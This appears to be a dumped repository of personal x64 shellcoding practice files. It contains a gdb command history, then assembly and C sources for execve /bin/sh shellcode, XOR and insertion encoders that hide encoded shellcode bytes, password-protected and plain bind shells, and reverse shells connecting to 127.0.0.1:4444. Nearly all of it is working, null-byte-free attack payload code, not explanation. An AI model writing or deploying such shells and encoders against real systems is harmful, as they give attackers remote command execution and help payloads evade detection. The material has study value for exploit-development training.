disass _start 130 | break *0x0000000000401054 131 | r 132 | break *&code 133 | r 134 | nexti 135 | break *&code 136 | r 137 | nexti 138 | break *401080 139 | break *0x401080 140 | r 141 | break *401080 142 | break *0x401080 143 | r 144 | disass _start 145 | nexti 146 | nexti 147 | disass _start 148 | break found_shellcode 149 | r 150 | c 151 | r 152 | nexti 153 | nexti 154 | nexti 155 | nexti 156 | nexti 157 | nexti 158 | nexti 159 | nexti 160 | *&hunter 161 | break *&hunter 162 | r 163 | nexti 164 | break *&hunter; 165 | break *&hunter 166 | r 167 | break *&hunter 168 | nexti 169 | r 170 | nexti 171 | break *&hunter 172 | r 173 | nexti 174 | break *&hunter 175 | nexti 176 | r 177 | nexti 178 | break *&hunter 179 | r 180 | nexti 181 | break *&hunter 182 | r 183 | nexti 184 | q 185 | nexti 186 | r 187 | r 188 | $rsp 189 | print $rsp 190 | print $rbx 191 | $rsp+$rbx 192 | x/xs $rsp+$rbx 193 | x/10xs $rsp+$rbx 194 | break *&hunter 195 | r 196 | telescope 50 197 | telescope -50 198 | x/10xs $rsp+10 199 | x/10xs $rsp+20 200 | x/10xs $rsp+50 201 | x/10xs $rsp-50 202 | x/50xs $rsp-50 203 | x/50gw $rsp-50 204 | x/50gd $rsp-50 205 | x/50x $rsp-50 206 | x/50x $rsp+50 207 | break *&hunter 208 | r 209 | x/50g 210 | x/50g $rsp 211 | x/50g $rsp-50 212 | x/50g $rsp+50 213 | telescope 50 214 | c 215 | breka *&hunter 216 | break *&hunter 217 | r 218 | nexti 219 | c 220 | $rsp 221 | print $rsp 222 | print $rbx 223 | nexti 224 | nexti 225 | nexti 226 | disass 227 | break found_shellcode 228 | c 229 | nexti 230 | c 231 | r 232 | c 233 | r 234 | telescope 10 235 | telescope 20 236 | r 237 | r 238 | r 239 | r 240 | r 241 | break *&search 242 | break &*search 243 | break *&search 244 | r 245 | disass 246 | disass _start 247 | disass &code 248 | disass &hunter 249 | break *&hunter 250 | run 251 | nexti 252 | x/10x 0x5555555551a3 253 | x/50x 0x5555555551a3 254 | x/50x 0x555555558060 255 | r 256 | r 257 | -------------------------------------------------------------------------------- /pwnage/x64 practice/28-rra-nonulls.asm: -------------------------------------------------------------------------------- 1 | ; RIP relative addressing with no nulls 2 | global _start 3 | 4 | section .text 5 | 6 | _start: 7 | jmp real_start 8 | hello_world: db "Hello fucker!",0xa 9 | 10 | real_start: 11 | mov rax, 1 12 | mov rdi, 1 ; stdout 13 | lea rsi, [rel hello_world] 14 | mov rdx, 14 15 | syscall 16 | 17 | mov rax, 60 18 | mov rdi, 11 19 | syscall 20 | 21 | -------------------------------------------------------------------------------- /pwnage/x64 practice/28-rra.nasm: -------------------------------------------------------------------------------- 1 | ; RIP relative addressing 2 | global _start 3 | 4 | section .text 5 | 6 | _start: 7 | mov rax, 1 8 | mov rdi, 1 ; stdout 9 | lea rsi, [rel hello_world] 10 | mov rdx, 14 11 | syscall 12 | 13 | mov rax, 60 14 | mov rdi, 11 15 | syscall 16 | 17 | hello_world: db "Hello fucker!",0xa 18 | -------------------------------------------------------------------------------- /pwnage/x64 practice/29-execve.asm: -------------------------------------------------------------------------------- 1 | 2 | global _start 3 | 4 | section .text 5 | 6 | _start: 7 | ; syscall number 8 | xor rax,rax 9 | add rax, 59 10 | 11 | ;push null dq (quadword) into stack 12 | xor rbx,rbx 13 | push rbx 14 | 15 | ; move command into rcx then push 16 | mov rcx, 0x68732f2f6e69622f ; "/bin//sh"[::-1].encode('hex') 17 | push rcx 18 | xor rcx, rcx 19 | mov rdi, rsp 20 | 21 | ; make rdx point to null byte 22 | push rbx 23 | mov rdx, rsp 24 | 25 | ; make rsi point to string dereferehce 26 | push rdi 27 | mov rsi, rsp 28 | 29 | syscall 30 | 31 | -------------------------------------------------------------------------------- /pwnage/x64 practice/31-execve-jcp.asm: -------------------------------------------------------------------------------- 1 | global _start 2 | 3 | section .text 4 | 5 | _start: 6 | jmp find_address 7 | 8 | shellcode: 9 | xor rax, rax 10 | 11 | pop rdi 12 | mov [rdi+7], byte ah 13 | mov [rdi+8], rdi 14 | mov [rdi+16], rax 15 | 16 | lea rsi, [rdi+8] 17 | lea rdx, [rdi+16] 18 | 19 | add rax, 59 20 | 21 | syscall 22 | 23 | find_address: 24 | call shellcode 25 | 26 | shell_string: db "/bin/shABBBBBBBBCCCCCCCC" -------------------------------------------------------------------------------- /pwnage/x64 practice/32-execve-rra.asm: -------------------------------------------------------------------------------- 1 | global _start 2 | 3 | section .text 4 | 5 | _start: 6 | jmp skip 7 | shell_string: db "/bin/shABBBBBBBBCCCCCCCCD" 8 | 9 | skip: 10 | 11 | lea rdi, [rel shell_string] 12 | 13 | xor rax, rax 14 | 15 | mov [rdi+7], byte ah 16 | mov [rdi+8], rdi 17 | mov [rdi+16], rax 18 | mov [rdi+24], byte ah 19 | 20 | lea rsi, [rdi+8] 21 | lea rdx, [rdi+16] 22 | 23 | add rax, 59 24 | 25 | syscall 26 | -------------------------------------------------------------------------------- /pwnage/x64 practice/34-xor-encoder-jcp.asm: -------------------------------------------------------------------------------- 1 | 2 | global _start 3 | 4 | section .text 5 | 6 | _start: 7 | jmp find_address 8 | 9 | decoder: 10 | pop rdi 11 | inc rdi 12 | mov rbx, rdi 13 | xor rcx,rcx 14 | 15 | decode: 16 | xor byte [rdi], 0xAA 17 | inc rdi 18 | loop decode 19 | 20 | jmp rbx 21 | 22 | find_address: 23 | call decoder 24 | 25 | ; 31-execve-jcp.asm shellcode (len 60) 26 | shellcode: db 0x41,0xb7,0xe2,0x9b,0x6a,0xf5,0x22,0xcd,0xad,0xe2,0x23,0xd5,0xa2,0xe2,0x23,0xed,0xba,0xe2,0x27,0xdd,0xa2,0xe2,0x27,0xfd,0xba,0xe2,0x29,0x6a,0x91,0xa5,0xaf,0x42,0x74,0x55,0x55,0x55,0x85,0xc8,0xc3,0xc4,0x85,0xd9,0xc2,0xeb,0xe8,0xe8,0xe8,0xe8,0xe8,0xe8,0xe8,0xe8,0xe9,0xe9,0xe9,0xe9,0xe9,0xe9,0xe9,0xe9 27 | -------------------------------------------------------------------------------- /pwnage/x64 practice/34-xor-encoder.asm: -------------------------------------------------------------------------------- 1 | ; This one works if assembled and linked, but not if turned into shellcode, since the data section doesn't make it accross 2 | 3 | 4 | global _start 5 | 6 | section .text 7 | 8 | _start: 9 | 10 | decoder: 11 | ; pop rdi 12 | lea rbx, [execve_shellcode] 13 | 14 | xor rcx,rcx 15 | add cl, 30 16 | 17 | decode: 18 | xor byte [rbx], 0xAA 19 | inc rbx 20 | loop decode 21 | 22 | jmp execve_shellcode 23 | 24 | section .data 25 | ; 29-execve.asm shellcode (len 30) 26 | execve_shellcode: db 0xe2,0x9b,0x6a,0xe2,0x29,0x6a,0x91,0xe2,0x9b,0x71,0xf9,0xe2,0x13,0x85,0xc8,0xc3,0xc4,0x85,0x85,0xd9,0xc2,0xfb,0xe2,0x9b,0x63,0xe2,0x23,0x4d,0xa5,0xaf 27 | 28 | ; 31-execve-jcp.asm shellcode (len 60) 29 | execve_jcp_shellcode: db 0x41,0xb7,0xe2,0x9b,0x6a,0xf5,0x22,0xcd,0xad,0xe2,0x23,0xd5,0xa2,0xe2,0x23,0xed,0xba,0xe2,0x27,0xdd,0xa2,0xe2,0x27,0xfd,0xba,0xe2,0x29,0x6a,0x91,0xa5,0xaf,0x42,0x74,0x55,0x55,0x55,0x85,0xc8,0xc3,0xc4,0x85,0xd9,0xc2,0xeb,0xe8,0xe8,0xe8,0xe8,0xe8,0xe8,0xe8,0xe8,0xe9,0xe9,0xe9,0xe9,0xe9,0xe9,0xe9,0xe9 -------------------------------------------------------------------------------- /pwnage/x64 practice/37-insertion-encoder.asm: -------------------------------------------------------------------------------- 1 | 2 | global _start 3 | 4 | section .text 5 | 6 | _start: 7 | jmp find_address 8 | 9 | decoder: 10 | pop rdi 11 | mov r8, rdi; r8 points to shellcode and is inc by 1 12 | mov r9, rdi; r9 points to shellcode invalid bytes and is inc by 2 13 | inc r9 14 | xor r10, r10; r10 will store bytes being transferred 15 | 16 | decode: 17 | mov r10b, byte [r9] 18 | xor r10b, 0xaa 19 | jnz end 20 | 21 | mov r10b, byte [r9+1] 22 | mov byte [r8+1], r10b 23 | 24 | inc r8 25 | inc r9 26 | inc r9 27 | 28 | jmp decode 29 | 30 | end: 31 | jmp rdi 32 | 33 | 34 | find_address: 35 | call decoder 36 | 37 | ; 31-execve-jcp.asm shellcode (len 60) 38 | shellcode: db 0x48,0xaa,0x31,0xaa,0xc0,0xaa,0x48,0xaa,0x83,0xaa,0xc0,0xaa,0x3b,0xaa,0x48,0xaa,0x31,0xaa,0xdb,0xaa,0x53,0xaa,0x48,0xaa,0xb9,0xaa,0x2f,0xaa,0x62,0xaa,0x69,0xaa,0x6e,0xaa,0x2f,0xaa,0x2f,0xaa,0x73,0xaa,0x68,0xaa,0x51,0xaa,0x48,0xaa,0x31,0xaa,0xc9,0xaa,0x48,0xaa,0x89,0xaa,0xe7,0xaa,0x53,0xaa,0x48,0xaa,0x89,0xaa,0xe2,0xaa,0x57,0xaa,0x48,0xaa,0x89,0xaa,0xe6,0xaa,0xf,0xaa,0x5,0xbb 39 | 40 | 41 | 42 | -------------------------------------------------------------------------------- /pwnage/x64 practice/45-bindshell.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | int main() 10 | { 11 | 12 | int resultfd, sockfd; 13 | int port = 11111; 14 | struct sockaddr_in my_addr; 15 | char client_password[6000]; 16 | 17 | char challenge[20] = "What?!\n"; 18 | char greeting[20] = "Welcome!\n"; 19 | char key[16] = "g3tyoursh3llbruh"; 20 | 21 | // syscall 102 22 | // int socketcall(int call, unsigned long *args); 23 | 24 | // sycall socketcall (sys_socket 1) 25 | sockfd = socket(AF_INET, SOCK_STREAM, 0); 26 | 27 | // syscall socketcall (sys_setsockopt 14) 28 | int one = 1; 29 | setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &one, sizeof(one)); 30 | 31 | // set struct values 32 | my_addr.sin_family = AF_INET; // 2 33 | my_addr.sin_port = htons(port); // port number 34 | my_addr.sin_addr.s_addr = INADDR_ANY; // 0 fill with the local IP 35 | 36 | // syscall socketcall (sys_bind 2) 37 | bind(sockfd, (struct sockaddr *) &my_addr, sizeof(my_addr)); 38 | 39 | // syscall socketcall (sys_listen 4) 40 | listen(sockfd, 0); 41 | 42 | // syscall socketcall (sys_accept 5) 43 | resultfd = accept(sockfd, NULL, NULL); 44 | 45 | send(resultfd, challenge, sizeof(challenge), 0); 46 | 47 | recv(resultfd, client_password, sizeof(client_password), 0); 48 | 49 | 50 | if (strncmp(client_password, key, sizeof(key)) == 0) { 51 | 52 | send(resultfd, greeting, sizeof(greeting), 0); 53 | // syscall 63 54 | dup2(resultfd, 2); 55 | dup2(resultfd, 1); 56 | dup2(resultfd, 0); 57 | 58 | // syscall 11 59 | execve("/bin/sh", NULL, NULL); 60 | 61 | } 62 | 63 | 64 | return 0; 65 | } -------------------------------------------------------------------------------- /pwnage/x64 practice/46-bindshell-password.asm: -------------------------------------------------------------------------------- 1 | global _start 2 | 3 | section .text 4 | 5 | _start: 6 | ; RAX - syscall number 7 | ; RDI - 1st arg 8 | ; RSI - 2nd arg 9 | ; RDX - 3rd arg 10 | ; R10 11 | ; R8 12 | ; R9 13 | 14 | xor rax,rax 15 | xor rdi,rdi 16 | xor rsi,rsi 17 | xor rdx,rdx 18 | xor r10, r10 19 | xor r8,r8 20 | xor r9,r9 21 | 22 | 23 | ; // sycall socketcall (sys_socket 1) 24 | ; sockfd = socket(AF_INET, SOCK_STREAM, 0); 25 | ; socket.AF_INET == 2 26 | ; socket.SOCK_STREAM == 1 27 | mov al, 41 28 | mov dil, 2 29 | mov sil, 1 30 | syscall 31 | 32 | mov rdi, rax ; store returned sockfd value to rdi 33 | 34 | 35 | ; // set struct values 36 | ; my_addr.sin_family = AF_INET; // 2 37 | ; my_addr.sin_port = htons(port); // port number 38 | ; my_addr.sin_addr.s_addr = INADDR_ANY; // 0 fill with the local IP 39 | xor rax, rax 40 | push rax 41 | mov dword [rsp-4], eax; INADDR_ANY == 0 42 | mov word [rsp-6], 0x5c11; hex(socket.htons(4444)) 43 | ; below is done this way because mov word [rsp-8], 2 had a null byte in it 44 | ; mov word [rsp-8], 2 45 | xor r9, r9 46 | mov byte [rsp-7], r9b 47 | mov byte [rsp-8], 2; AF_INET == 2 48 | sub rsp, 8 49 | ; mov r15, rsp; store address pointing to sockaddr struct, as we'll need it later 50 | 51 | ; syscall 49 52 | ; bind(sockfd, (struct sockaddr *) &my_addr, sizeof(my_addr)); 53 | xor rax, rax 54 | mov al, 49 55 | mov rsi, rsp 56 | xor rdx, rdx 57 | mov dl, 16 58 | syscall 59 | 60 | ; syscall 50 61 | ; listen(sockfd, 2); 62 | xor rax, rax 63 | mov al, 50 64 | xor rsi, rsi 65 | mov sil, 2 66 | syscall 67 | 68 | ; syscall 43 69 | ; resultfd = accept(sockfd, NULL, NULL); 70 | 71 | xor rax, rax 72 | mov al, 43 73 | sub rsp, 16 ; free up 16 bytes on stack to represent NULL sockaddr objects 74 | mov rsi, rsp 75 | mov byte [rsp-1], 16 76 | sub rsp, 1 77 | mov rdx, rsp 78 | syscall 79 | 80 | mov r14, rax ; store resultfd in r14 81 | 82 | ; close parent socket 83 | xor rax, rax 84 | mov al, 3 85 | syscall 86 | 87 | 88 | 89 | recv_string: 90 | 91 | ; syscall 45 92 | ; ssize_t recvfrom(int sockfd, void *buf, size_t len, int flags, 93 | ; struct sockaddr *src_addr, socklen_t *addrlen); 94 | xor rax, rax 95 | mov al, 45 96 | 97 | mov rdi, r14 98 | ; Make space in stack for buffer 99 | sub rsp, 16 100 | mov rsi, rsp 101 | ; Length of buffer 102 | mov rdx, 16 103 | 104 | ; flags == 0 105 | xor r10, r10 106 | 107 | ; Push 16 null bytes onto stack for null sockaddr 108 | xor r8, r8 109 | push r8 110 | push r8 111 | mov r8, rsp 112 | 113 | xor r9,r9 114 | mov r9b, 16 115 | 116 | syscall 117 | 118 | 119 | compare_string: 120 | 121 | xor rdx, rdx 122 | xor r10, r10 123 | xor r8, r8 124 | xor r9,r9 125 | 126 | mov r9, 0x0a746572636573 ; secret 127 | xor [rsi], r9 128 | 129 | jz shell 130 | 131 | end: 132 | 133 | ; close baby socket 134 | xor rax, rax 135 | mov al, 3 136 | mov rdi, r14 137 | syscall 138 | 139 | ; exit 140 | xor rax, rax 141 | mov al, 60 142 | syscall 143 | 144 | shell: 145 | ; strncmp(client_password, key, sizeof(key)) == 0 146 | 147 | ; // syscall 33 148 | ; dup2(resultfd, 2); 149 | ; dup2(resultfd, 1); 150 | ; dup2(resultfd, 0); 151 | xor rax, rax 152 | mov al, 33 153 | mov rdi, r14 154 | xor rsi, rsi 155 | syscall 156 | xor rax, rax 157 | mov al, 33 158 | inc rsi 159 | syscall 160 | xor rax, rax 161 | mov al, 33 162 | inc rsi 163 | syscall 164 | 165 | ; // syscall 59 166 | ; execve("/bin/sh", NULL, NULL); 167 | xor rax, rax 168 | mov al, 59 169 | xor rbx,rbx 170 | push rbx 171 | mov rcx, 0x68732f2f6e69622f ; "/bin//sh"[::-1].encode('hex') 172 | push rcx 173 | mov rdi, rsp 174 | 175 | push rbx 176 | mov rdx, rsp 177 | 178 | push rdi 179 | mov rsi, rsp 180 | syscall 181 | 182 | -------------------------------------------------------------------------------- /pwnage/x64 practice/46-bindshell.asm: -------------------------------------------------------------------------------- 1 | global _start 2 | 3 | section .text 4 | 5 | _start: 6 | ; RAX - syscall number 7 | ; RDI - 1st arg 8 | ; RSI - 2nd arg 9 | ; RDX - 3rd arg 10 | ; R10 11 | ; R8 12 | ; R9 13 | 14 | xor rax,rax 15 | xor rdi,rdi 16 | xor rsi,rsi 17 | xor rdx,rdx 18 | xor r10, r10 19 | xor r8,r8 20 | xor r9,r9 21 | 22 | 23 | ; // sycall socketcall (sys_socket 1) 24 | ; sockfd = socket(AF_INET, SOCK_STREAM, 0); 25 | ; socket.AF_INET == 2 26 | ; socket.SOCK_STREAM == 1 27 | mov al, 41 28 | mov dil, 2 29 | mov sil, 1 30 | syscall 31 | 32 | mov rdi, rax ; store returned sockfd value to rdi 33 | 34 | 35 | ; // set struct values 36 | ; my_addr.sin_family = AF_INET; // 2 37 | ; my_addr.sin_port = htons(port); // port number 38 | ; my_addr.sin_addr.s_addr = INADDR_ANY; // 0 fill with the local IP 39 | xor rax, rax 40 | push rax 41 | mov dword [rsp-4], eax; INADDR_ANY == 0 42 | mov word [rsp-6], 0x5c11; hex(socket.htons(4444)) 43 | ; below is done this way because mov word [rsp-8], 2 had a null byte in it 44 | ; mov word [rsp-8], 2 45 | xor r9, r9 46 | mov byte [rsp-7], r9b 47 | mov byte [rsp-8], 2; AF_INET == 2 48 | sub rsp, 8 49 | 50 | ; syscall 49 51 | ; bind(sockfd, (struct sockaddr *) &my_addr, sizeof(my_addr)); 52 | xor rax, rax 53 | mov al, 49 54 | mov rsi, rsp 55 | xor rdx, rdx 56 | mov dl, 16 57 | syscall 58 | 59 | ; syscall 50 60 | ; listen(sockfd, 2); 61 | xor rax, rax 62 | mov al, 50 63 | xor rsi, rsi 64 | mov sil, 2 65 | syscall 66 | 67 | ; syscall 43 68 | ; resultfd = accept(sockfd, NULL, NULL); 69 | 70 | xor rax, rax 71 | mov al, 43 72 | sub rsp, 16 ; free up 16 bytes on stack to represent NULL sockaddr objects 73 | mov rsi, rsp 74 | mov byte [rsp-1], 16 75 | sub rsp, 1 76 | mov rdx, rsp 77 | syscall 78 | 79 | mov r14, rax ; store resultfd in r14 80 | 81 | ; close parent socket 82 | xor rax, rax 83 | mov al, 3 84 | syscall 85 | 86 | ; // syscall 33 87 | ; dup2(resultfd, 2); 88 | ; dup2(resultfd, 1); 89 | ; dup2(resultfd, 0); 90 | xor rax, rax 91 | mov al, 33 92 | mov rdi, r14 93 | xor rsi, rsi 94 | syscall 95 | xor rax, rax 96 | mov al, 33 97 | inc rsi 98 | syscall 99 | xor rax, rax 100 | mov al, 33 101 | inc rsi 102 | syscall 103 | 104 | ; // syscall 59 105 | ; execve("/bin/sh", NULL, NULL); 106 | xor rax, rax 107 | mov al, 59 108 | xor rbx,rbx 109 | push rbx 110 | mov rcx, 0x68732f2f6e69622f ; "/bin//sh"[::-1].encode('hex') 111 | push rcx 112 | mov rdi, rsp 113 | 114 | push rbx 115 | mov rdx, rsp 116 | 117 | push rdi 118 | mov rsi, rsp 119 | syscall -------------------------------------------------------------------------------- /pwnage/x64 practice/47-reverseshell-password-simple.asm: -------------------------------------------------------------------------------- 1 | ; Reverse shell that connects to 127.0.0.1:4444 and requires apassword "secret\n" 2 | 3 | global _start 4 | 5 | section .text 6 | 7 | _start: 8 | 9 | xor rax,rax 10 | xor rdi,rdi 11 | xor rsi,rsi 12 | xor rdx,rdx 13 | 14 | ; // sycall socketcall (sys_socket 1) 15 | ; sockfd = socket(AF_INET, SOCK_STREAM, 0); 16 | ; socket.AF_INET == 2 17 | ; socket.SOCK_STREAM == 1 18 | mov al, 41 19 | mov dil, 2 20 | mov sil, 1 21 | syscall 22 | 23 | mov rdi, rax ; store returned sockfd value to rdi 24 | 25 | ; server.sin_family = AF_INET; 26 | ; server.sin_port = htons(atoi(argv[1])); 27 | ; server.sin_addr.s_addr = inet_addr("127.0.0.1"); 28 | ; bzero(&server.sin_zero, 8); 29 | xor rax, rax 30 | push rax 31 | ; below can't be done with a direct move as there were too many null bytes 32 | ; mov dword [rsp-4], 0x0100007f; binascii.hexlify(socket.inet_aton("127.0.0.1")[::-1]) 33 | push rax 34 | add byte [rsp+4], 0x7f 35 | inc byte [rsp+7] 36 | mov word [rsp+2], 0x5c11; hex(socket.htons(4444)) 37 | mov byte [rsp], 2; AF_INET == 2 38 | 39 | ; syscall 42 40 | ; connect(sock, (struct sockaddr *)&server, sockaddr_len); 41 | mov al, 42 42 | mov rsi, rsp 43 | mov dl, 16 44 | syscall 45 | 46 | recv_string: 47 | 48 | ; syscall 45 49 | ; ssize_t recvfrom(int sockfd, void *buf, size_t len, int flags, 50 | ; struct sockaddr *src_addr, socklen_t *addrlen); 51 | xor rax, rax 52 | mov al, 45 53 | 54 | ; Make space in stack for buffer 55 | sub rsp, 16 56 | mov rsi, rsp 57 | ; Length of buffer 58 | mov rdx, 16 59 | 60 | ; flags == 0 61 | xor r10, r10 62 | 63 | ; Push 16 null bytes onto stack for null sockaddr 64 | xor r8, r8 65 | push r8 66 | push r8 67 | mov r8, rsp 68 | 69 | xor r9,r9 70 | mov r9b, 16 71 | 72 | syscall 73 | 74 | compare_string: 75 | 76 | xor rdx, rdx 77 | xor r10, r10 78 | xor r8, r8 79 | xor r9,r9 80 | 81 | mov r9, 0x0a746572636573 ; secret 82 | xor [rsi], r9 83 | 84 | jz shell 85 | 86 | end: 87 | ; close socket 88 | xor rax, rax 89 | mov al, 3 90 | syscall 91 | 92 | ; exit 93 | xor rax, rax 94 | mov al, 60 95 | syscall 96 | 97 | shell: 98 | ; // syscall 33 99 | ; dup2(resultfd, 2); 100 | ; dup2(resultfd, 1); 101 | ; dup2(resultfd, 0); 102 | xor rax, rax 103 | mov al, 33 104 | xor rsi, rsi 105 | syscall 106 | xor rax, rax 107 | mov al, 33 108 | inc rsi 109 | syscall 110 | xor rax, rax 111 | mov al, 33 112 | inc rsi 113 | syscall 114 | 115 | ; // syscall 59 116 | ; execve("/bin/sh", NULL, NULL); 117 | xor rax, rax 118 | mov al, 59 119 | xor rbx,rbx 120 | push rbx 121 | mov rcx, 0x68732f2f6e69622f ; "/bin//sh"[::-1].encode('hex') 122 | push rcx 123 | mov rdi, rsp 124 | 125 | push rbx 126 | mov rdx, rsp 127 | 128 | push rdi 129 | mov rsi, rsp 130 | syscall -------------------------------------------------------------------------------- /pwnage/x64 practice/47-reverseshell-password.asm: -------------------------------------------------------------------------------- 1 | ; Reverse shell that connects to 127.0.0.1:4444 and requires password "s3cr3tShell\n" 2 | 3 | global _start 4 | 5 | section .text 6 | 7 | _start: 8 | 9 | xor rax,rax 10 | xor rdi,rdi 11 | xor rsi,rsi 12 | xor rcx,rcx 13 | xor rdx,rdx 14 | 15 | ; // sycall socketcall (sys_socket 1) 16 | ; sockfd = socket(AF_INET, SOCK_STREAM, 0); 17 | ; socket.AF_INET == 2 18 | ; socket.SOCK_STREAM == 1 19 | mov al, 41 20 | mov dil, 2 21 | mov sil, 1 22 | syscall 23 | 24 | mov rdi, rax ; store returned sockfd value to rdi 25 | 26 | ; server.sin_family = AF_INET; 27 | ; server.sin_port = htons(atoi(argv[1])); 28 | ; server.sin_addr.s_addr = inet_addr("127.0.0.1"); 29 | ; bzero(&server.sin_zero, 8); 30 | xor rax, rax 31 | push rax 32 | ; below can't be done with a direct move as there were too many null bytes 33 | ; mov dword [rsp-4], 0x0100007f; binascii.hexlify(socket.inet_aton("127.0.0.1")[::-1]) 34 | push rax 35 | add byte [rsp+4], 0x7f 36 | inc byte [rsp+7] 37 | mov word [rsp+2], 0x5c11; hex(socket.htons(4444)) 38 | mov byte [rsp], 2; AF_INET == 2 39 | 40 | ; syscall 42 41 | ; connect(sock, (struct sockaddr *)&server, sockaddr_len); 42 | mov al, 42 43 | mov rsi, rsp 44 | mov dl, 16 45 | syscall 46 | 47 | recv_string: 48 | 49 | ; syscall 45 50 | ; ssize_t recvfrom(int sockfd, void *buf, size_t len, int flags, 51 | ; struct sockaddr *src_addr, socklen_t *addrlen); 52 | xor rax, rax 53 | mov al, 45 54 | 55 | ; Make space in stack for buffer 56 | sub rsp, 16 57 | mov rsi, rsp 58 | ; Length of buffer 59 | xor rdx, rdx 60 | mov dl, 16 61 | 62 | ; flags == 0 63 | xor r10, r10 64 | 65 | ; Push 16 null bytes onto stack for null sockaddr 66 | xor r8, r8 67 | push r8 68 | push r8 69 | mov r8, rsp 70 | 71 | xor r9,r9 72 | mov r9b, 16 73 | 74 | syscall 75 | 76 | 77 | compare_string: 78 | ; Simple, sub 8 bytes comparison can be done like two lines below 79 | ; mov r9, 0x0a746572636573 ; secret 80 | ; xor [rsi], r9 81 | 82 | ; More complex comparison with bigger strings (16 bytes in this case) can be done like code below 83 | ; If you need to do bigger strings, make sure to change the buffer size on recv_string as well 84 | ; "s3cr3tShell\n"[::-1].encode('hex') == 0a6c6c656853743372633373 85 | mov byte [rsp-5], 0x0a 86 | mov byte [rsp-6], 0x6c 87 | mov byte [rsp-7], 0x6c 88 | mov byte [rsp-8], 0x65 89 | mov byte [rsp-9], 0x68 90 | mov byte [rsp-10], 0x53 91 | mov byte [rsp-11], 0x74 92 | mov byte [rsp-12], 0x33 93 | mov byte [rsp-13], 0x72 94 | mov byte [rsp-14], 0x63 95 | mov byte [rsp-15], 0x33 96 | mov byte [rsp-16], 0x73 97 | sub rsp, 16 98 | 99 | xor rbx,rbx ; loop counter 100 | xor rcx,rcx 101 | add cl, 16 102 | 103 | compare_string_byte_by_byte: 104 | mov r8b, byte [rsp+rbx] 105 | xor byte [rsi+rbx], r8b 106 | jne end 107 | inc rbx 108 | loop compare_string_byte_by_byte 109 | 110 | shell: 111 | ; // syscall 33 112 | ; dup2(resultfd, 2); 113 | ; dup2(resultfd, 1); 114 | ; dup2(resultfd, 0); 115 | xor rax, rax 116 | mov al, 33 117 | xor rsi, rsi 118 | syscall 119 | xor rax, rax 120 | mov al, 33 121 | inc rsi 122 | syscall 123 | xor rax, rax 124 | mov al, 33 125 | inc rsi 126 | syscall 127 | 128 | ; // syscall 59 129 | ; execve("/bin/sh", NULL, NULL); 130 | xor rax, rax 131 | mov al, 59 132 | xor rbx,rbx 133 | push rbx 134 | mov rcx, 0x68732f2f6e69622f ; "/bin//sh"[::-1].encode('hex') 135 | push rcx 136 | mov rdi, rsp 137 | 138 | push rbx 139 | mov rdx, rsp 140 | 141 | push rdi 142 | mov rsi, rsp 143 | syscall 144 | 145 | end: 146 | ; close socket 147 | xor rax, rax 148 | mov al, 3 149 | syscall 150 | 151 | ; exit 152 | xor rax, rax 153 | mov al, 60 154 | syscall 155 | 156 | 157 | -------------------------------------------------------------------------------- /pwnage/x64 practice/47-reverseshell.asm: -------------------------------------------------------------------------------- 1 | global _start 2 | 3 | section .text 4 | 5 | _start: 6 | 7 | xor rax,rax 8 | xor rdi,rdi 9 | xor rsi,rsi 10 | xor rdx,rdx 11 | xor r10, r10 12 | xor r8,r8 13 | xor r9,r9 14 | 15 | ; // sycall socketcall (sys_socket 1) 16 | ; sockfd = socket(AF_INET, SOCK_STREAM, 0); 17 | ; socket.AF_INET == 2 18 | ; socket.SOCK_STREAM == 1 19 | mov al, 41 20 | mov dil, 2 21 | mov sil, 1 22 | syscall 23 | 24 | mov rdi, rax ; store returned sockfd value to rdi 25 | 26 | 27 | ; server.sin_family = AF_INET; 28 | ; server.sin_port = htons(atoi(argv[1])); 29 | ; server.sin_addr.s_addr = inet_addr("127.0.0.1"); 30 | xor rax, rax 31 | push rax 32 | ; below can't be done with a direct move as there were too many null bytes 33 | ; mov dword [rsp-4], 0x0100007f; binascii.hexlify(socket.inet_aton("127.0.0.1")[::-1]) 34 | add byte [rsp-4], 0x7f 35 | inc byte [rsp-1] 36 | mov word [rsp-6], 0x5c11; hex(socket.htons(4444)) 37 | ; below is done this way because mov word [rsp-8], 2 had a null byte in it 38 | ; mov word [rsp-8], 2 39 | xor r9, r9 40 | mov byte [rsp-7], r9b 41 | mov byte [rsp-8], 2; AF_INET == 2 42 | sub rsp, 8 43 | 44 | ; syscall 42 45 | ; connect(sock, (struct sockaddr *)&server, sockaddr_len); 46 | xor rax, rax 47 | mov al, 42 48 | mov rsi, rsp 49 | xor rdx, rdx 50 | mov dl, 16 51 | syscall 52 | 53 | ; // syscall 33 54 | ; dup2(resultfd, 2); 55 | ; dup2(resultfd, 1); 56 | ; dup2(resultfd, 0); 57 | xor rax, rax 58 | mov al, 33 59 | xor rsi, rsi 60 | syscall 61 | xor rax, rax 62 | mov al, 33 63 | inc rsi 64 | syscall 65 | xor rax, rax 66 | mov al, 33 67 | inc rsi 68 | syscall 69 | 70 | ; // syscall 59 71 | ; execve("/bin/sh", NULL, NULL); 72 | xor rax, rax 73 | mov al, 59 74 | xor rbx,rbx 75 | push rbx 76 | mov rcx, 0x68732f2f6e69622f ; "/bin//sh"[::-1].encode('hex') 77 | push rcx 78 | mov rdi, rsp 79 | 80 | push rbx 81 | mov rdx, rsp 82 | 83 | push rdi 84 | mov rsi, rsp 85 | syscall -------------------------------------------------------------------------------- /pwnage/x64 practice/47-reverseshell.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | 11 | 12 | void main(int argc, char **argv) 13 | { 14 | struct sockaddr_in server; 15 | int sock; 16 | int sockaddr_len = sizeof(struct sockaddr_in); 17 | char *arguments[] = { "/bin/sh", 0 }; 18 | 19 | sock = socket(AF_INET, SOCK_STREAM, 0); 20 | 21 | server.sin_family = AF_INET; 22 | server.sin_port = htons(atoi(argv[1])); 23 | server.sin_addr.s_addr = inet_addr("127.0.0.1"); 24 | bzero(&server.sin_zero, 8); 25 | 26 | connect(sock, (struct sockaddr *)&server, sockaddr_len); 27 | 28 | dup2(sock, 0); 29 | dup2(sock, 1); 30 | dup2(sock, 2); 31 | 32 | execve(arguments[0], &arguments[0], NULL); 33 | 34 | 35 | } 36 | 37 | -------------------------------------------------------------------------------- /pwnage/x64 practice/GettingEIP.asm: -------------------------------------------------------------------------------- 1 | global _start 2 | 3 | section .text 4 | 5 | _start: 6 | 7 | ; mov rax,rip ; This fails as "There are no machine code instructions to let you access 